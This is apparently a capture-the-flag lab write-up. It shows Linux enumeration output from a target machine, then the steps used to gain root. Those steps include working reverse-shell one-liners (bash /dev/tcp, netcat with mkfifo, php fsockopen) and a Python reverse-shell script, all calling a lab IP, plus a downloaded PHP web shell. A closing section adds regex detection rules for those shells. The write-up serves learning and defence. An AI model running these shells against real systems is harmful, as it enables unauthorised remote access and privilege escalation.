-rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service
-rw-r--r-- 1 root root 251 Sep 17 2016 open-vm-tools.service
-rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service
-rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service
lrwxrwxrwx 1 root root 27 May 10 2016 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root 21 May 10 2016 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root 412 May 10 2016 plymouth-halt.service
-rw-r--r-- 1 root root 426 May 10 2016 plymouth-kexec.service
-rw-r--r-- 1 root root 421 May 10 2016 plymouth-poweroff.service
-rw-r--r-- 1 root root 200 May 10 2016 plymouth-quit-wait.service
-rw-r--r-- 1 root root 194 May 10 2016 plymouth-quit.service
-rw-r--r-- 1 root root 244 May 10 2016 plymouth-read-write.service
-rw-r--r-- 1 root root 416 May 10 2016 plymouth-reboot.service
-rw-r--r-- 1 root root 532 May 10 2016 plymouth-start.service
-rw-r--r-- 1 root root 291 May 10 2016 plymouth-switch-root.service
-rw-r--r-- 1 root root 490 May 10 2016 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root 467 May 10 2016 systemd-ask-password-plymouth.service
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel5.target.wants
-rw-r--r-- 1 root root 251 Apr 5 2016 cron.service
-rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service
-rw-r--r-- 1 root root 395 Jun 3 2015 resolvconf.service
-rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service
-rw-r--r-- 1 root root 241 Mar 2 2015 ufw.service
-rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service
-rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer
-rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service
-rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Apr 12 2016 apache2-systemd.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 May 10 2016 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Dec 4 2017 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Dec 4 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Dec 4 2017 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Dec 4 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 29 May 10 2016 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-quit.service -> ../plymouth-quit.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 May 10 2016 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 May 10 2016 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Dec 4 2017 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Dec 4 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 24 Dec 4 2017 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Dec 4 2017 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Dec 4 2017 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Dec 4 2017 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Dec 4 2017 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Dec 4 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Dec 4 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Dec 4 2017 setvtrgb.service -> ../setvtrgb.service
lrwxrwxrwx 1 root root 32 Dec 4 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Dec 4 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Dec 4 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Dec 4 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Dec 4 2017 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Dec 4 2017 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Dec 4 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Dec 4 2017 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Dec 4 2017 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Dec 4 2017 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Dec 4 2017 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Dec 4 2017 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Dec 4 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Dec 4 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Dec 4 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 May 10 2016 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Dec 4 2017 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Dec 4 2017 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Dec 4 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Dec 4 2017 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Dec 4 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Dec 4 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Dec 4 2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Jan 12 2017 disable-with-time-daemon.conf

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Dec 4 2017 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Dec 4 2017 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jan 12 2017 debian.conf

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Dec 4 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Dec 4 2017 getty-static.service -> ../getty-static.service

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Jan 18 2017 90-systemd.preset

/lib/systemd/system-generators:
total 668K
-rwxr-xr-x 1 root root 59K Jan 18 2017 systemd-dbus1-generator
-rwxr-xr-x 1 root root 71K Jan 18 2017 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 43K Jan 18 2017 systemd-debug-generator
-rwxr-xr-x 1 root root 79K Jan 18 2017 systemd-fstab-generator
-rwxr-xr-x 1 root root 39K Jan 18 2017 systemd-getty-generator
-rwxr-xr-x 1 root root 119K Jan 18 2017 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 39K Jan 18 2017 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 39K Jan 18 2017 systemd-insserv-generator
-rwxr-xr-x 1 root root 35K Jan 18 2017 systemd-rc-local-generator
-rwxr-xr-x 1 root root 31K Jan 18 2017 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Jan 18 2017 systemd-sysv-generator

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Jan 18 2017 80-container-host0.network
-rw-r--r-- 1 root root 482 Jan 18 2017 80-container-ve.network
-rw-r--r-- 1 root root 80 Jan 18 2017 99-default.link

/lib/systemd/system-shutdown:
total 0


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16


[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2017-09-18T15:09:02


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
setenvif_module (shared)
status_module (shared)


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1482 Dec 4 2017 /etc/passwd
-rw-r--r-- 1 root root 820 Dec 4 2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
-rw-r----- 1 root shadow 933 Dec 4 2017 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 10624 Feb 9 2017 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Aug 11 2016 /usr/lib/openssh/ssh-keysign


[-] SGID files:
-rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 22768 Mar 29 2016 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 36080 Apr 5 2016 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 358624 Aug 11 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 62336 Mar 29 2016 /usr/bin/chage
-rwxr-sr-x 1 root tty 27368 Dec 16 2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root mlocate 39520 Nov 17 2014 /usr/bin/mlocate


[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 703 May 5 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
-rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 14867 Apr 11 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 7788 Dec 4 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
-rw-r--r-- 1 root root 2084 Sep 5 2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 338 Nov 17 2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
-rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 3028 Feb 15 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
-rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
-rw-r--r-- 1 root root 191 Jan 18 2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 144 Dec 4 2017 /etc/kernel-img.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 1371 Jan 27 2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 280 Jun 19 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 350 Dec 4 2017 /etc/popularity-contest.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/scriptmanager/.bash_history
/home/arrexel/.bash_history


[-] Location and Permissions (if accessible) of .bak file(s):
-rw-r--r-- 1 root root 3024 Dec 4 2017 /etc/apt/sources.bak


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Feb 15 2017 .
drwxr-xr-x 12 root root 4096 Dec 4 2017 ..


### SCAN COMPLETE ####################################

sudo -u scriptmanager whoami  # run in /dev/phpbash.php; not really persistent, so set up a reverse shell

nc -lvnp 8081

bash -i >& /dev/tcp/10.10.14.28/8081 0>&1  # Bash reverse shell from pentestmonkey; no success

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 8081 >/tmp/f # Netcat reverse shell from pentestmonkey

php -r '$sock=fsockopen("10.10.14.20",8081);exec("/bin/sh -i <&3 >&3 2>&3");' # No hi

cd /var/www/html
cd uploads
touch test

Privilege Escalation

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php ./

# Modify the php-reverse-shell.php IP and PORT

wget 10.10.14.28/php-reverse-shell.php

python -c 'import pty;pty.spawn("/bin/bash")'

sudo -u scriptmanager bash

ls -al

# Create this on local machine
# test1.py
# ------------------------------------------------
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.28",1234))
os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1) 
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
  • Transfer this file to the target machine (the one with the reverse shell)

wget http://10.10.14.28:80/test1.py

# Attacking machine
nc -lvnp 1234

python test1.py 

rm test.py # Soon you will get root

cat root.txt
	- Ans: ********************************

  • User arrexel flag
cd /home/arrexel
cat user.txt
	- Ans: ********************************
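
Seen from the defender's side, every reverse-shell attempt above leaves a recognisable command line in process-execution logs, and all of them run as the Apache account (`www-data`, per the LinEnum output). The following detection sketch is an added example, not part of the original write-up; the `time|user|cmdline` record format, the rule names and the sample records are assumptions constructed for illustration.

```python
import re

# Command-line shapes of the reverse-shell attempts shown in this write-up.
SIGNATURES = {
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[\w.-]+/\d+"),
    "fifo_shell_netcat": re.compile(
        r"mkfifo\s+\S+.*\bsh\s+-i\b.*\b(?:nc|ncat|netcat)\b"),
    "php_fsockopen_exec": re.compile(
        r"\bphp\d*\s+-r\b.*fsockopen\s*\(.*\bexec\s*\("),
    "python_pty_spawn": re.compile(r"\bpython[\d.]*\s+-c\b.*pty\.spawn\s*\("),
}
# Assumption: the web-server account has no business launching these programs.
WEB_USERS = {"www-data"}
RISKY_FOR_WEB_USER = {"sh", "bash", "nc", "netcat", "wget", "python", "sudo"}

def parse(line):
    """Split one 'time|user|cmdline' record (constructed format)."""
    ts, user, cmd = line.split("|", 2)
    return {"ts": ts, "user": user, "cmd": cmd}

def classify(event):
    """Return the sorted rule names that fire for one process-exec event."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(event["cmd"])]
    program = event["cmd"].split()[0].rsplit("/", 1)[-1]
    if event["user"] in WEB_USERS and program in RISKY_FOR_WEB_USER:
        hits.append("web_user_spawned_" + program)
    return sorted(hits)

def scan(lines):
    """Map the timestamp of every flagged record to the rules it triggered."""
    alerts = {}
    for line in lines:
        event = parse(line)
        hits = classify(event)
        if hits:
            alerts[event["ts"]] = hits
    return alerts

# Constructed exec records (not from the target), as a web shell's `sh -c` logs them.
SAMPLE = [
    "13:40:01|www-data|sh -c sudo -u scriptmanager whoami 2>&1",
    "13:41:10|www-data|sh -c bash -i >& /dev/tcp/10.10.14.28/8081 0>&1",
    "13:42:30|www-data|sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 8081 >/tmp/f",
    r"""13:43:05|www-data|sh -c php -r '$sock=fsockopen("10.10.14.20",8081);exec("/bin/sh -i <&3 >&3 2>&3");'""",
    r"""13:44:20|www-data|python -c 'import pty;pty.spawn("/bin/bash")'""",
    "13:50:00|root|/usr/sbin/logrotate /etc/logrotate.conf",
]

if __name__ == "__main__":
    for ts, rules in scan(SAMPLE).items():
        print(ts, ", ".join(rules))
```

The `web_user_spawned_*` rule fires even for the harmless-looking `whoami` call, which is the point: a shell started by the web-server account is worth an alert regardless of what it runs.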

Skills Learned

  • Basic web fuzzing techniques
  • Locating recently modified files

Hong Woo
WRITTEN BY
Hong
📚Cybersecurity Student🚩CTF Player☁️Cloud Computing